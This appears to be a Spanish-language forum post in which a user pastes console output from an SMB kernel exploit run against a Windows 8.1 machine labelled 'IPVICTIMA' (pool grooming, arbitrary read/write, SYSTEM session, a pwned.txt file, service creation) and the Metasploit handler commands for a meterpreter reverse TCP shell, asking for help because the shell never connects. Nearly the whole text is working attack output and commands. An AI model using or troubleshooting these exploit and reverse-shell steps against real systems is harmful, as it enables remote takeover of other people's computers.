Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017afe0098
InParam: 0xffffc00179f1216c
MID: 0x1403
unexpected alignment, diff: 0x10cd098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df92098
InParam: 0xffffc0017afe616c
MID: 0x1503
unexpected alignment, diff: 0x2fab098
leak failed... try again
CONNECTION: 0xffffe000cc2b1390
SESSION: 0xffffc00181464050
FLINK: 0xffffc0017df9e098
InParam: 0xffffc0017df9816c
MID: 0x1503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target <----------------VES QUE SE CREA OSEA ES VULNERABLE!!
Done
hay se creo el payload pero no me llega la conexion al meterpreter sigue igual
Target OS: Windows 8.1
Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e2e6098
InParam: 0xffffc0017e19b16c
MID: 0x2c03
unexpected alignment, diff: 0x14a098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017e376098
InParam: 0xffffc0017e2f616c
MID: 0x2d03
unexpected alignment, diff: 0x7f098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017ee5f098
InParam: 0xffffc0017e37c16c
MID: 0x2d03
unexpected alignment, diff: 0xae2098
leak failed... try again
CONNECTION: 0xffffe000ccba74b0
SESSION: 0xffffc0017f80add0
FLINK: 0xffffc0017eef4098
InParam: 0xffffc0017eeee16c
MID: 0x2d03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on IPVICTIMA..... <------hay ME APARECIO LA IP PERO NO CONECTA
Creating service zRZy.....
Starting service zRZy.....
The NETBIOS connection with the remote host timed out.
Removing service zRZy.....
ServiceExec Error on: IPVICTIMA
nca_s_proto_error
Done
y esta es mi conexion en metasploit:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST MI IP LOCAL
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
- Started reverse TCP handler on MI IP LOCAL:4444
alguna ayuda porfavor!!